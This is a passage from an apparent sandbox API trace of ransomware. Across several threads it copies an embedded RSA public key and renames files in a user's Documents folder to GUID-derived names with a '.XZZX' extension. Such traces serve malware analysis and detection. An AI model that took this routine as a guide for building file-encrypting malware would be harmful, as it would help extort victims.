LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0232.790] lstrcpyW (in: lpString1=0x2daf460, lpString2="A0DC431228DE1E088FD30DB72CF60250.XZZX" | out: lpString1="A0DC431228DE1E088FD30DB72CF60250.XZZX") returned="A0DC431228DE1E088FD30DB72CF60250.XZZX" [0232.790] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0232.790] SetErrorMode (uMode=0x1) returned 0x1 [0232.790] lstrcpyW (in: lpString1=0x2daf860, lpString2="A0DC431228DE1E088FD30DB72CF60250.XZZX" | out: lpString1="A0DC431228DE1E088FD30DB72CF60250.XZZX") returned="A0DC431228DE1E088FD30DB72CF60250.XZZX" [0232.790] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xb05f9ab8, Data2=0x4780, Data3=0x4aaa, Data4=([0]=0x9b, [1]=0x72, [2]=0x61, [3]=0x7b, [4]=0x55, [5]=0x9c, [6]=0x88, [7]=0xa))) returned 0x0 [0232.790] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\A0DC431228DE1E088FD30DB72CF60250.XZZX") returned 102 [0232.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0232.790] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\B3B6640014DA7B00B05F9AB817B55F48.XZZX") returned 102 [0232.790] StrStrW (lpFirst="A0DC431228DE1E088FD30DB72CF60250.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 901 os_tid = 0x111c [0232.946] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0232.946] lstrcpyW (in: lpString1=0x2daf460, lpString2="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX" | out: lpString1="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX") returned="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX" [0232.946] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0232.946] SetErrorMode (uMode=0x1) returned 0x1 [0232.946] lstrcpyW (in: lpString1=0x2daf860, lpString2="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX" | out: lpString1="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX") returned="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX" [0232.946] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xda0f4ec9, Data2=0xb0ae, Data3=0x4e02, Data4=([0]=0x84, [1]=0x8f, [2]=0x93, [3]=0x69, [4]=0xcb, [5]=0xc1, [6]=0xd2, [7]=0x6d))) returned 0x0 [0232.946] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\B4A323B51740B3FD1D50DD1D1B6D9845.XZZX") returned 102 [0232.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0232.946] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\BC91BC9E35D6655CDA0F4EC938B149A4.XZZX") returned 102 [0232.946] StrStrW (lpFirst="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 902 os_tid = 0x1120 [0233.102] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0233.102] lstrcpyW (in: lpString1=0x2daf460, lpString2="EE9B10B00F697CE4836159F013D6612C.XZZX" | out: lpString1="EE9B10B00F697CE4836159F013D6612C.XZZX") returned="EE9B10B00F697CE4836159F013D6612C.XZZX" [0233.102] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0233.102] SetErrorMode (uMode=0x1) returned 0x1 [0233.102] lstrcpyW (in: lpString1=0x2daf860, lpString2="EE9B10B00F697CE4836159F013D6612C.XZZX" | out: lpString1="EE9B10B00F697CE4836159F013D6612C.XZZX") returned="EE9B10B00F697CE4836159F013D6612C.XZZX" [0233.102] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xb6de9573, Data2=0xbb26, Data3=0x4d33, Data4=([0]=0x85, [1]=0x6b, [2]=0x51, [3]=0x4c, [4]=0xec, [5]=0xd7, [6]=0xff, [7]=0xd4))) returned 0x0 [0233.102] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\EE9B10B00F697CE4836159F013D6612C.XZZX") returned 102 [0233.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0233.102] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\BC353012386FB692B6DE95733B4A9ADA.XZZX") returned 102 [0233.102] StrStrW (lpFirst="EE9B10B00F697CE4836159F013D6612C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 903 os_tid = 0x1124 [0233.260] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0233.261] lstrcpyW (in: lpString1=0x2daf460, lpString2="069C108614226DDA8ED0A1A1188F5222.XZZX" | out: lpString1="069C108614226DDA8ED0A1A1188F5222.XZZX") returned="069C108614226DDA8ED0A1A1188F5222.XZZX" [0233.261] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0233.261] SetErrorMode (uMode=0x1) returned 0x1 [0233.261] lstrcpyW (in: lpString1=0x2daf860, lpString2="069C108614226DDA8ED0A1A1188F5222.XZZX" | out: lpString1="069C108614226DDA8ED0A1A1188F5222.XZZX") returned="069C108614226DDA8ED0A1A1188F5222.XZZX" [0233.261] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xb8b32a22, Data2=0x277c, Data3=0x4ce9, Data4=([0]=0x93, [1]=0x3e, [2]=0xc3, [3]=0x42, [4]=0x58, [5]=0xd4, [6]=0xf1, [7]=0xa8))) returned 0x0 [0233.261] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\069C108614226DDA8ED0A1A1188F5222.XZZX") returned 118 [0233.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0233.261] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\C23396780BDCBFDCB8B32A220EB7A424.XZZX") returned 118 [0233.261] StrStrW (lpFirst="069C108614226DDA8ED0A1A1188F5222.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 904 os_tid = 0x1128 [0233.414] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0233.414] lstrcpyW (in: lpString1=0x2daf460, lpString2="33820CBD02F4B0D349B807FF070C951B.XZZX" | out: lpString1="33820CBD02F4B0D349B807FF070C951B.XZZX") returned="33820CBD02F4B0D349B807FF070C951B.XZZX" [0233.414] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0233.414] SetErrorMode (uMode=0x1) returned 0x1 [0233.414] lstrcpyW (in: lpString1=0x2daf860, lpString2="33820CBD02F4B0D349B807FF070C951B.XZZX" | out: lpString1="33820CBD02F4B0D349B807FF070C951B.XZZX") returned="33820CBD02F4B0D349B807FF070C951B.XZZX" [0233.414] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x76c8bd94, Data2=0xcf03, Data3=0x4f72, Data4=([0]=0xa7, [1]=0xb9, [2]=0x81, [3]=0x6b, [4]=0x3f, [5]=0x62, [6]=0x90, [7]=0xcf))) returned 0x0 [0233.414] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\33820CBD02F4B0D349B807FF070C951B.XZZX") returned 118 [0233.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0233.414] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\B5A4E4BC403E1C5676C8BD944319009E.XZZX") returned 118 [0233.414] StrStrW (lpFirst="33820CBD02F4B0D349B807FF070C951B.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 905 os_tid = 0x112c [0233.571] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0233.571] lstrcpyW (in: lpString1=0x2daf460, lpString2="3D2178A332ED6F4701E92E353705538F.XZZX" | out: lpString1="3D2178A332ED6F4701E92E353705538F.XZZX") returned="3D2178A332ED6F4701E92E353705538F.XZZX" [0233.571] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0233.571] SetErrorMode (uMode=0x1) returned 0x1 [0233.571] lstrcpyW (in: lpString1=0x2daf860, lpString2="3D2178A332ED6F4701E92E353705538F.XZZX" | out: lpString1="3D2178A332ED6F4701E92E353705538F.XZZX") returned="3D2178A332ED6F4701E92E353705538F.XZZX" [0233.571] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xf97c290a, Data2=0x58ee, Data3=0x4de5, Data4=([0]=0x85, [1]=0xf6, [2]=0x9, [3]=0x97, [4]=0xa1, [5]=0xa1, [6]=0x60, [7]=0x41))) returned 0x0 [0233.571] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\3D2178A332ED6F4701E92E353705538F.XZZX") returned 118 [0233.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0233.571] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\9F89974C1B0F22E6F97C290A1DEA072E.XZZX") returned 118 [0233.571] StrStrW (lpFirst="3D2178A332ED6F4701E92E353705538F.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 906 os_tid = 0x1130 [0233.726] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0233.726] lstrcpyW (in: lpString1=0x2daf460, lpString2="9345D86A0F87DA84ADA8003E13B4BECC.XZZX" | out: lpString1="9345D86A0F87DA84ADA8003E13B4BECC.XZZX") returned="9345D86A0F87DA84ADA8003E13B4BECC.XZZX" [0233.726] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0233.726] SetErrorMode (uMode=0x1) returned 0x1 [0233.726] lstrcpyW (in: lpString1=0x2daf860, lpString2="9345D86A0F87DA84ADA8003E13B4BECC.XZZX" | out: lpString1="9345D86A0F87DA84ADA8003E13B4BECC.XZZX") returned="9345D86A0F87DA84ADA8003E13B4BECC.XZZX" [0233.726] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xf7fae8b8, Data2=0x46f2, Data3=0x4401, Data4=([0]=0xa8, [1]=0x18, [2]=0xd9, [3]=0x13, [4]=0x66, [5]=0xae, [6]=0x19, [7]=0x2e))) returned 0x0 [0233.726] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\9345D86A0F87DA84ADA8003E13B4BECC.XZZX") returned 118 [0233.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0233.726] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\06D24DF012D88EF2F7FAE8B815B3733A.XZZX") returned 118 [0233.726] StrStrW (lpFirst="9345D86A0F87DA84ADA8003E13B4BECC.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 907 os_tid = 0x1134 [0233.882] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0233.882] lstrcpyW (in: lpString1=0x2daf460, lpString2="A216BEA01542C25C94FD01F0195AA6A4.XZZX" | out: lpString1="A216BEA01542C25C94FD01F0195AA6A4.XZZX") returned="A216BEA01542C25C94FD01F0195AA6A4.XZZX" [0233.882] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0233.882] SetErrorMode (uMode=0x1) returned 0x1 [0233.882] lstrcpyW (in: lpString1=0x2daf860, lpString2="A216BEA01542C25C94FD01F0195AA6A4.XZZX" | out: lpString1="A216BEA01542C25C94FD01F0195AA6A4.XZZX") returned="A216BEA01542C25C94FD01F0195AA6A4.XZZX" [0233.882] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x2a71062e, Data2=0xda58, Data3=0x4906, Data4=([0]=0x82, [1]=0xb9, [2]=0xf3, [3]=0x91, [4]=0xfd, [5]=0xea, [6]=0xde, [7]=0xa0))) returned 0x0 [0233.882] wsprintfW (in: 